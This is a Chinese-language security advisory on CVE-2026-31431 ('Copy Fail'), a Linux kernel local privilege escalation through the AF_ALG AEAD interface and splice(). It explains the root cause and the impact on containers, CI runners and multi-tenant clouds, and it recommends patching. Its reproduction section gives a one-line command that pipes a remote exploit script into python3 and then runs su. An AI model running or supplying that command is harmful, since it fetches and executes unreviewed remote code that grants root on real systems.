Linux 是目前全球服务器、云计算、容器环境中使用最广泛的操作系统内核，绝大多数主流 Linux 发行版（Ubuntu、Debian、RHEL、Amazon Linux、SUSE、Arch、Fedora 等）均基于其构建。

2026 年 4 月 29 日，长亭安全应急响应中心监测到互联网公开披露了一个影响范围极广的Linux提权漏洞 CVE-2026-31431，命名为"Copy Fail"。该漏洞源于 Linux 内核加密子系统 `authencesn`模块中的一处逻辑缺陷，攻击者仅需本地普通用户权限，通过链式利用 AF\_ALG 套接字与 `splice()`系统调用，即可向页缓存（page cache）写入任意内容，最终实现本地提权至 root。漏洞影响 2017 年至补丁发布前构建的几乎所有 Linux 内核版本，EXP 已公开，利用稳定性极高，建议受影响用户立即修复。

**漏洞成因**

Linux 内核加密模块 `authencesn`在 2017 年引入了一处针对 AEAD（认证加密）操作的原地（in-place）优化，该优化导致在特定条件下，页缓存（page cache）中的只读页面可以被错误地放入可写目标散列表（scatterlist）。攻击者通过 AF\_ALG 套接字暴露的内核加密 API，结合 `splice()`系统调用，利用上述逻辑缺陷实现对 setuid 二进制文件（如 `/usr/bin/su`）页缓存的 4 字节任意写入，从而篡改程序逻辑，获取 root shell。

整个利用过程为直线逻辑，无需竞争窗口（race window），无需内核特定偏移，无需预装任何特殊工具。

## **漏洞影响**

*   本地提权至 root：任意本地普通用户账户可无条件提权为 root。
    
*   容器逃逸：Kubernetes / 容器环境中，页缓存为宿主机共享，容器内攻击者可突破容器边界，危及宿主节点及同节点其他租户。
    
*   CI/CD 环境沦陷：GitHub Actions、GitLab Runner、Jenkins Agent 等执行不可信代码的 CI 环境，攻击者可通过恶意 PR 直接获取 Runner 宿主机的 root 权限。
    
*   云多租户环境：Notebook、Serverless、Agent 沙箱等执行用户代码的云服务，租户可提权为宿主机 root。
    
*   漏洞持续近十年：问题代码于 2017 年引入，此后所有 Linux 发行版均受影响。

Linux 内核 AF\_ALG AEAD 实现因错误支持原地加密操作，导致内存处理缺陷，攻击者可通过构造请求触发内核内存破坏。

### 漏洞概述

CVE-2026-31431 是 Linux 内核加密子系统中的一个安全漏洞，存在于 algif\_aead 模块（AF\_ALG 接口的 AEAD 实现）中。该漏洞源于对“原地（in-place）加密操作”的不当处理，引入了潜在的内存安全问题。

AF\_ALG 是 Linux 提供给用户态程序访问内核加密能力的接口，而 AEAD（Authenticated Encryption with Associated Data）是一种同时提供机密性与完整性保护的加密模式。该漏洞正是发生在 AEAD socket 接口的数据处理逻辑中。

### 漏洞成因

在引入 commit 72548b093ee3 后，内核尝试支持 AEAD 的“原地操作”（即输入缓冲区与输出缓冲区重叠的情况）。然而：

在 algif\_aead 实现中，源数据与目标数据实际来自不同的内存映射区域 原地操作在该场景下没有实际意义 为支持该特性引入了额外复杂逻辑（尤其是 Associated Data 的复制处理）

这导致在特定情况下：

内存处理逻辑出现异常 数据复制路径存在不一致 可能触发内存破坏或未定义行为

本质上，这是一个由于不必要复杂性引入的内存处理缺陷（memory handling flaw）。

漏洞复现：
```
curl https://copy.fail/exp | python3 && su

```

### 参考资料

https://github.com/theori-io/copy-fail-CVE-2026-31431/issues/6

https://xint.io/blog/copy-fail-linux-distributions

Linux核弹级提权1秒Root